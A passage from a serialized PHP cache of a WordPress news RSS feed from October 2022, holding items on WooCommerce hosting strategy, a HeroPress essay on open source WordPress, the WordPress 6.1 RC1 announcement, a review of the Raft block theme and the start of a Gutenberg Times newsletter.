plays a different role in the ecosystem as the maintainer of the core software. In an interview with the Tavern after his keynote, Maiorana said the vast majority (+90%) of ongoing WooCommerce core development is done by the WooCommerce team at Automattic.</p>\n\n\n\n<p>&#8220;One important difference is that we are really focused on the WooCommerce ecosystem – including the thousands of web hosts that help support and drive WordPress and Woo adoption across the globe – as our most important &#8216;customer,\'&#8221; he said.</p>\n\n\n\n<p>&#8220;And what we’re hearing from these customers is that it is challenging to compete with the simplicity offered by proprietary, turnkey e-commerce solutions. At the same time, many web hosts don’t have the capabilities to address things like onboarding, conversion, and retention holistically – they need our help to compete and win.&#8221;</p>\n\n\n\n<p>Many of the major hosting companies that serve WordPress customers, like WP Engine, GoDaddy, and Bluehost have already developed their own hosted WooCommerce solutions, although there are many smaller companies that do not offer curated plugins, themes, and friendly onboarding that may be more open to partnering with the makers of WooCommerce. </p>\n\n\n\n<p>&#8220;We’re also working with a &#8216;core first&#8217; perspective,&#8221; Maiorana said. &#8220;That means that our efforts here will help drive improvements directly back into the core WooCommerce experience and across other, related extensions. We want to take everything we learn and any benefits we discover back to every WooCommerce user.</p>\n\n\n\n<p>&#8220;We think the winning strategy for the WooCommerce community is not to split efforts or keep these innovations to ourselves, but instead work together to make WooCommerce better for everyone.&#8221;</p>\n\n\n\n<p>Maiorana could not share any more details of the solution they are developing, but with more than 800 products in the WooCommerce.com marketplace, the company has the ability to offer a compelling deal on extensions for those who host with them. WooCommerce is also currently beta testing WooPay, a single-click cross-site checkout experience that uses WooCommerce Payments. Integrating WooPay with WooCommerce&#8217;s network of hosting customers may also give the new checkout (and WooCommerce Payments) a major boost.</p>\n\n\n\n<p>With WooCommerce soon to be in the running with its solution hosted on WordPress.com, the competition around managed e-commerce hosting is starting to heat up. It may no longer be enough for hosting companies to simply offer WooCommerce and Storefront pre-installed. Although the largest hosting companies have been acquiring WooCommerce plugin shops in order to create compelling packages of store functionality, there&#8217;s room for diverse offerings in a wide range of pricing tiers, as WooCommerce adoption continues to grow.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Oct 2022 04:23:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"HeroPress: The good and the bad of open source WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://heropress.com/?post_type=heropress-essays&p=4883\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:164:\"https://heropress.com/essays/the-good-and-the-bad-of-open-source-wordpress/#utm_source=rss&utm_medium=rss&utm_campaign=the-good-and-the-bad-of-open-source-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5984:\"<img width=\"1024\" height=\"512\" src=\"https://heropress.com/wp-content/uploads/2022/10/101222-2-min.jpg\" class=\"attachment-large size-large wp-post-image\" alt=\"Pull Quote: Ultimately, I’m glad that WordPress is open source, even despite the drawbacks.\" />\nHere is Lesley reading her own story aloud.\n\n\n\n<p>Why I believe open source is the best and worst thing about WordPress.</p>\n\n\n\n<p>When I first discovered WordPress in 2016, it was merely a tool for me. It was the cheapest and most flexible way to get a website started for my fledgling explainer video business, so I used it.</p>\n\n\n\n<p>As a long time blogger and website-maker, since the days of GeoCities, I was very confident I would find WordPress a breeze to use. </p>\n\n\n\n<blockquote><p>I opened up a fresh new install of WordPress for the very first time in my life and was confronted with an intimidating admin interface. </p></blockquote>\n\n\n\n<p>The stuff on the right seemed meaningless and unhelpful, and the stuff on the left was way more complicated than I was used to. What did media library mean and when do I use it?</p>\n\n\n\n<p>It was lucky that I’d been making websites and blogging since I was a child. It was also a good thing that I knew WordPress was really <em>really</em> popular. Had it not been for those two things, I would likely have given up. Instead, I powered through, confident that, if millions of people could figure it out, I could too.</p>\n\n\n\n<p>After some tinkering, and reading recommendations, I purchased and installed a page builder, Thrive Themes, and started building my site. I watched many tutorials, made tons of mistakes, and got frustrated countless times. But after a month or two, it finally felt like I’d gone from pushing a boulder uphill, to chasing the boulder downhill. Incidentally, I still use Thrive today!</p>\n\n\n\n<h3 class=\"kt-adv-heading_262ee3-78 wp-block-kadence-advancedheading\">Why Open Source Matters</h3>\n\n\n\n<p>I owe a big part of my journey to the open source nature of WordPress. Being able to play around for almost no money allowed me the freedom to experiment and make mistakes with little penalty. I didn’t have to worry about paying $50 or even $5 per month for each random side project I start, which allowed me to play around and really deepen my knowledge of building websites.</p>\n\n\n\n<blockquote><p>I bet lots of other people attribute their web building journey to WordPress and open source too. </p></blockquote>\n\n\n\n<p>And that’s likely to be a large reason for WordPress’ popularity. It’s free for anyone to use, so lots of hosts offer it as one of their default options. There are also loads of plugins out there that help you turn your WordPress site into anything you can possibly imagine. It means that a receptionist or a journalist can move from one job to another and easily log into their company’s website, update the opening hours or write a blog post, because everyone is on WordPress.</p>\n\n\n\n<p>It means a first-time business owner like myself can create their first website and not worry about making newbie mistakes since the cost of wrong decisions is low – it’s really easy to migrate from host to host, change themes, remove plugins and more.</p>\n\n\n\n<h3 class=\"kt-adv-heading_c0af34-ca wp-block-kadence-advancedheading\">Where&#8217;s It&#8217;s Not Perfect</h3>\n\n\n\n<p>However, open source is not without its drawbacks. Like I mentioned above, the first time I logged into WordPress I found it overwhelming. It’s hard to draw a direct line to the exact reason why, but here are some of the reasons that came to mind:</p>\n\n\n\n<p>Firstly, there isn’t a dedicated team with KPIs to hit who are focused on making onboarding super easy for complete beginners. In commercial software, this is typically a top priority as customers who can’t get onboarded, will usually churn, which loses money for the company.</p>\n\n\n\n<p>In contrast, in WordPress, we have contributors who are typically seasoned WordPress pros. They no longer remember what it’s like to use WordPress for the first time. And because of the contributor model, we also don’t have enough teams with dedicated UX researchers, product managers, and more for each aspect of WordPress.</p>\n\n\n\n<p>In addition, WordPress is largely built by developers with a developer-first mindset. Thus, the teams are conceived from a developer standpoint (performance, multisite, etc) rather than from a user standpoint. </p>\n\n\n\n<blockquote><p>For example, it would be wonderful to have teams focused on the experiences around onboarding, dashboard, plugins, themes, which is how the average user mentally structures WordPress.&nbsp;</p></blockquote>\n\n\n\n<p>Also, it’s impossible to keep track of usage data, so there’s no way to know where people are struggling across the entire WordPress project. This matters because the best way to justify having teams focused on certain aspects of WordPress is to present numbers. However, since we don’t have numbers, it’s impossible to present a strong case.</p>\n\n\n\n<p>The final issue is that WordPress is gigantic. It powers everything from The American Whitehouse website, to small businesses in Singapore (like mine). This pins WordPress in a very tricky spot, because the needs of the Whitehouse are very different to the needs of a small business on the equator. And any updates that are made to WordPress have to take the breadth of use cases into consideration.</p>\n\n\n\n<p>Ultimately, I’m glad that WordPress is open source, even despite the drawbacks. It helps so many people grow their businesses, communicate, and simply share their thoughts with everyone on the internet. There is no such thing as only good without the bad. And I’m glad WordPress exists.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://heropress.com/essays/the-good-and-the-bad-of-open-source-wordpress/\">The good and the bad of open source WordPress</a> appeared first on <a rel=\"nofollow\" href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Oct 2022 00:00:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Lesley Sim\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WordPress.org blog: WordPress 6.1 Release Candidate 1 (RC1) Now Available\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=13579\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-1-rc1-now-available/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:9422:\"<p>The first release candidate (RC1) for WordPress 6.1 is now available!</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>This is an important milestone in the 6.1 release cycle. “Release Candidate” means that this version of WordPress is ready for release! Before the official release date, time is set aside for the community to perform final reviews and help test. Since the WordPress ecosystem includes thousands of plugins and themes, it is important that everyone checks to see if anything was missed along the way. That means the project would <em>love</em> your help.</p>\n\n\n\n<p>WordPress 6.1 is planned for official release on November 1st, 2022, three weeks from today.&nbsp;</p>\n\n\n\n<p><strong>This version of the WordPress software is under development</strong>. Please do not install, run, or test this version of WordPress on production or mission-critical websites. Instead, it is recommended that you test RC1 on a test server and site.&nbsp;</p>\n\n\n\n<p>You can test WordPress 6.1 RC1 in three ways:</p>\n\n\n\n<p><strong>Option 1: </strong>Install and activate the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (select the “Bleeding edge” channel and “Beta/RC Only” stream).</p>\n\n\n\n<p><strong>Option 2: </strong>Direct download the <a href=\"https://wordpress.org/wordpress-6.1-RC1.zip\">RC1 version (zip)</a>.</p>\n\n\n\n<p><strong>Option 3:</strong> Use the following WP-CLI command:</p>\n\n\n\n<p><code>wp core update --version=6.1-RC1</code></p>\n\n\n\n<p>Additional information on the <a href=\"https://make.wordpress.org/core/6-1/\">6.1 release cycle is available here</a>.</p>\n\n\n\n<p>Check the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> for <a href=\"https://make.wordpress.org/core/tag/dev-notes+6-1/\">6.1-related developer notes</a> in the coming weeks detailing all upcoming changes.</p>\n\n\n\n<h2>What’s in WordPress 6.1 RC1?</h2>\n\n\n\n<p>Since Beta 3, approximately 100 items have been addressed, bringing the total count to more than 2,000 updates since WordPress 6.0 in May of 2022.&nbsp;</p>\n\n\n\n<ul>\n<li><a href=\"https://github.com/WordPress/gutenberg/commits/wp/6.1\">GitHub tickets</a></li>\n\n\n\n<li><a href=\"https://core.trac.wordpress.org/query?status=accepted&status=closed&changetime=10%2F04%2F2022..10%2F11%2F2022&resolution=fixed&milestone=6.1&col=id&col=summary&col=status&col=milestone&col=owner&col=type&col=priority&order=id\">Trac tickets</a>&nbsp;</li>\n</ul>\n\n\n\n<p>WordPress 6.1 is the third major release for 2022, following 5.9 and 6.0, released in January and May of this year, respectively.</p>\n\n\n\n<h3><strong>WordPress 6.1 highlights for end-users</strong></h3>\n\n\n\n<ul>\n<li>Default theme powered by 10 unique style variations (<a href=\"https://make.wordpress.org/design/2022/09/07/tt3-default-theme-announcing-style-variation-selections/\">learn more</a>)</li>\n\n\n\n<li>More design tools in more blocks (<a href=\"https://github.com/WordPress/gutenberg/issues/43241\">learn more</a>)</li>\n\n\n\n<li>Expanded and refined <a href=\"https://make.wordpress.org/core/2022/08/25/core-editor-improvement-refining-the-template-creation-experience/\">template experience</a> and <a href=\"https://make.wordpress.org/core/2022/07/21/core-editor-improvement-deeper-customization-with-more-template-options/\">template options</a></li>\n\n\n\n<li>More intuitive document settings experience</li>\n\n\n\n<li>Improved quote and list blocks with inner block support</li>\n\n\n\n<li>More robust placeholders for various blocks</li>\n\n\n\n<li>New modal interfaces and preferences improvements</li>\n\n\n\n<li>Automatic navigation block selection with fallbacks and easier menu management</li>\n\n\n\n<li>Apply locking settings to all inner blocks in one click</li>\n\n\n\n<li>Improvements to the block theme discovery experience</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/11/wordpress-6-1-accessibility-improvements/\">Accessibility updates</a>, with more than 60 resolved tickets</li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/11/performance-field-guide-for-wordpress-6-1/\">Performance updates</a>, with more than 25 resolved tickets</li>\n</ul>\n\n\n\n<h3><strong>WordPress 6.1 highlights for developers</strong></h3>\n\n\n\n<ul>\n<li>Opt into appearance tools to make any theme more powerful</li>\n\n\n\n<li>New iteration on the style system</li>\n\n\n\n<li>Add starter patterns to any post type (<a href=\"https://make.wordpress.org/core/2022/07/07/whats-new-in-gutenberg-13-6-6-july/#post-type-patterns\">learn more</a>)</li>\n\n\n\n<li>Evolution of layout options including a new constrained option and the ability to disable layout options</li>\n\n\n\n<li>Content lock patterns for more curation options</li>\n\n\n\n<li>Expanded support for query loop blocks</li>\n\n\n\n<li>Allow the use of block-based template parts in classic themes (<a href=\"https://make.wordpress.org/themes/2022/09/12/testing-and-feedback-for-using-block-based-template-parts-in-classic-themes/\">give feedback</a>)</li>\n\n\n\n<li>Filter <code>theme.json</code> data (<a href=\"https://developer.wordpress.org/block-editor/reference-guides/filters/global-styles-filters/\">learn more</a>)</li>\n\n\n\n<li>Fluid typography allows for more responsiveness (<a href=\"https://make.wordpress.org/themes/2022/08/15/testing-and-feedback-for-the-fluid-typography-feature/\">give feedback</a>)</li>\n\n\n\n<li>Ability to style elements inside blocks like buttons, headings, or captions in <code>theme.json</code></li>\n</ul>\n\n\n\n<p><em>Please note that all features listed in this post are subject to change before the final release</em>.</p>\n\n\n\n<h2>Plugin and theme developers</h2>\n\n\n\n<p>All plugin and theme developers should test their respective extensions against WordPress 6.1 RC1 and update the “<em>Tested up to”</em> version in their readme file to 6.1. If you find compatibility problems, please post detailed information to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">support forums</a>, so these items can be investigated further prior to the final release date of November 1st.</p>\n\n\n\n<h2>Translate WordPress</h2>\n\n\n\n<p>Do you speak a language other than English? <a href=\"https://translate.wordpress.org/projects/wp/dev\">Help translate WordPress into more than 100 languages.</a> This release also marks the <a href=\"https://make.wordpress.org/polyglots/handbook/glossary/#hard-freeze\">hard string freeze</a> point of the 6.1 release cycle.</p>\n\n\n\n<h2>Keep WordPress bug-free – help with testing</h2>\n\n\n\n<p>Testing for issues is critical for stabilizing a release throughout its development. Testing is also a great way to contribute. <a href=\"https://make.wordpress.org/test/2022/09/21/help-test-wordpress-6-1/\">This detailed guide</a> is an excellent start if you have never tested a beta release.</p>\n\n\n\n<p>Testing helps ensure that this and future releases of WordPress are as stable and issue-free as possible. Anyone can take part in testing – regardless of prior experience.</p>\n\n\n\n<p>Want to know more about testing releases like this one? Read about the <a href=\"https://make.wordpress.org/test/\">testing initiatives</a> that happen in Make Core. You can also join a <a href=\"https://wordpress.slack.com/messages/core-test/\">core-test channel</a> on the <a href=\"https://wordpress.slack.com/\">Making WordPress Slack workspace</a>.</p>\n\n\n\n<p>If you have run into an issue, please report it to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. If you are comfortable writing a reproducible bug report, you can <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>. This is also where you can find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\n\n\n\n<p>To review features in the Gutenberg releases since WordPress 6.0 (the most recent major release of WordPress), access the <em>What’s New In Gutenberg</em> posts for <a href=\"https://make.wordpress.org/core/2022/09/16/whats-new-in-gutenberg-14-1-15-september/\">14.1</a>, <a href=\"https://make.wordpress.org/core/2022/09/01/whats-new-in-gutenberg-14-0-31-august/\">14.0</a>, <a href=\"https://make.wordpress.org/core/2022/08/17/whats-new-in-gutenberg-13-9-17-august/\">13.9</a>, <a href=\"https://make.wordpress.org/core/2022/08/04/whats-new-in-gutenberg-13-8-3-august/\">13.8</a>, <a href=\"https://make.wordpress.org/core/2022/07/20/whats-new-in-gutenberg-13-7-20-july/\">13.7</a>, <a href=\"https://make.wordpress.org/core/2022/07/07/whats-new-in-gutenberg-13-6-6-july/\">13.6</a>, <a href=\"https://make.wordpress.org/core/2022/06/22/whats-new-in-gutenberg-13-5-22-june/\">13.5</a>, <a href=\"https://make.wordpress.org/core/2022/06/10/whats-new-in-gutenberg-13-4-8-june/\">13.4</a>, <a href=\"https://make.wordpress.org/core/2022/05/26/whats-new-in-gutenberg-13-3-0-may-25/\">13.3</a>, <a href=\"https://make.wordpress.org/core/2022/05/12/whats-new-in-gutenberg-13-2-may-11/\">13.2</a>, and <a href=\"https://make.wordpress.org/core/2022/04/28/whats-new-in-gutenberg-13-1-27-april/\">13.1</a>.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h2>Haiku Fun for RC1</h2>\n\n\n\n<p>Languages abound<br />Test today, releases soon<br />Freedom to publish</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<p>Thank you to the following contributors for collaborating on this post:&nbsp;<a href=\"https://profiles.wordpress.org/webcommsat/\">@webcommsat</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Oct 2022 20:53:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Dan Soschin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:38;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"WPTavern: Raft: A New Multipurpose Block Theme for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138390\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"https://wptavern.com/raft-a-new-multipurpose-block-theme-for-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3903:\"<p><a href=\"https://themeisle.com/\">Themeisle</a>, longtime masters of the multipurpose WordPress theme, has launched its first block-based theme with the same trademark style and flexibility of its previous products. The shop currently distributes its <a href=\"https://wordpress.org/themes/hestia/\">Hestia</a> (100K+ installs) and <a href=\"https://wordpress.org/themes/neve/\">Neve</a> (300K+ installs) themes on WordPress.org, commercializing pro versions with upgrades and support. <a href=\"https://wordpress.org/themes/raft/\">Raft</a> is the latest addition to the lineup.</p>\n\n\n\n<img />\n\n\n\n<p>When it comes to full-site editing support, the WordPress directory still leans a little heavy on blog themes, but Raft was designed to suit a wide-ranging variety of use cases, as stated in the theme&#8217;s description:</p>\n\n\n\n<p><em>&#8220;It’s perfect for blogs, small business, startups, agencies, firms, e-commerce shops (WooCommerce storefront) as well as personal portfolio sites and most types of projects.&#8221;</em></p>\n\n\n\n<p>Although the default homepage looks simple, it&#8217;s the block patterns that make this theme ready for anything. Raft includes patterns for creating a cover image with title and background, image galleries with a title, post query loop, two columns for features or services, three columns of features, call to action, FAQ, inverted background, and a hero section. </p>\n\n\n\n<img />\n\n\n\n<p>When users first install the theme, it prompts them to install the free <a href=\"https://wordpress.org/plugins/otter-blocks/\">Otter Blocks</a> plugin, which adds more page building blocks and customization options. Raft also has compatibility with Elementor, Brizy, and Beaver Builder, in addition to Gutenberg, and support for WooCommerce. The Pro version of Otter Blocks contains more advanced WooCommerce blocks for building complex store layouts.</p>\n\n\n\n<img />\n\n\n\n<p>After activating the theme on a new install, clicking &#8220;Customize&#8221; takes the user to the Site Editor where it will be pre-filled to look nearly identical to the <a href=\"https://themeisle.com/demo/?theme=Raft\">demo</a>. There&#8217;s not much to the demo &#8211; it keeps the pages fairly simple and <a href=\"https://demosites.io/raft/patterns/\">showcases the patterns</a> on a separate page. Raft isn&#8217;t quite a blank slate but it does leave some room for the imagination, as it&#8217;s not stuffed full of content and animations. </p>\n\n\n\n<p>The theme comes with eight beautifully designed style variations, each with harmonious color combinations that create a different vibe for the website.</p>\n\n\n\n<img />image source: <a href=\"https://themeisle.com/themes/raft/\">Themeisle</a>\n\n\n\n<p>Rift packages full-site-editing templates that users can edit to further customize the main pages like 404, single blog posts, the front page, archives, and more. It also includes a blank page template.</p>\n\n\n\n<p>Themeisle markets its popular classic themes on WordPress.org with pro versions that include starter templates, additional header and footer options, custom layouts, WooCommerce layouts, and other features. The company has not created a pro version for Raft. They may still be developing upgrade options but the world of blocks changes the game, since custom layouts are much easier to create with the block editor. User expectations are different. It will be interesting to see how Themeisle markets its first block theme compared to its classic products.</p>\n\n\n\n<p>Rift is a good option if you need a lightweight theme that isn&#8217;t too opinionated but still provides the basic design as a starting place for building pages and customizing them with more advanced tools as necessary. If you are already one of the 100k+ Otter Blocks users, this theme integrates seamlessly. <a href=\"https://wordpress.org/themes/raft/\">Raft</a> is available to download for free on WordPress.org. </p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 11 Oct 2022 03:53:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:39;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"Do The Woo Community: Security Bugs, a Missed Learning Opportunity\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=73083\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://dothewoo.io/security-bugs-and-woocommerce-developers/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:419:\"<p>When a security bug report goes unanswered or is ignored, this is a potential learning experience that is being missed by that developer.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/security-bugs-and-woocommerce-developers/\">Security Bugs, a Missed Learning Opportunity</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 10 Oct 2022 16:07:28 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:151:\"Gutenberg Times: Style Variations in Theme Directory (Beta), first Devnotes for WordPress 6.1, eCommerce blocks by EDD and Woo – Weekend Edition #232\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=22382\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:153:\"https://gutenbergtimes.com/style-variations-in-theme-directory-beta-first-devnotes-for-wordpress-6-1-ecommerce-blocks-by-edd-and-woo-weekend-edition-232/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:21593:\"<p>Howdy, </p>\n\n\n\n<p>Next week is release week, with Release Candidate 1 (RC1) for WordPress 6.1 scheduled for Tuesday, and Gutenberg 14.3 stable scheduled for Wednesday. </p>\n\n\n\n<p>RC1 is the time when developers also published their Dev Notes for the Fieldguide, that covers all the changes, fixes, and features coming to a WordPress instance near you soon. Final release date is November 1st, 2022.</p>\n\n\n\n<p>It&#8217;s the second time, I volunteered for the documentation team on the release squad, so the Dev Notes have been on my mind the last week. The first set of Dev Notes you&#8217;ll find linked below. </p>\n\n\n\n<p>What have you been working on? Please let me know in the comments or email me <a href=\"mailto:pauli@gutenbergtimes.com\">pauli@gutenbergtimes.com</a> </p>\n\n\n\n<p>Now happy reading. </p>\n\n\n\n<p>Yours, 💕<br /><em>Birgit</em></p>\n\n\n\n<p>PS: Every week that starts with chatting on the panel of <a href=\"https://wpbuilds.com/2022/10/04/this-week-in-wordpress-224/\">This Week in WordPress</a> show is bound to be a great week. It was again great fun chatting with Nathan Wrigley, Bob Dunn and Kathy Zant. <a href=\"https://wpbuilds.com/2022/10/04/this-week-in-wordpress-224/\">The recording is now available</a>. We discussed last week&#8217;s WordPress news from the open-source teams and around the ecosystem. In the show notes Wrigley provides a ton of interesting articles you might have missed (as did I) 😎.</p>\n\n\n\n<a 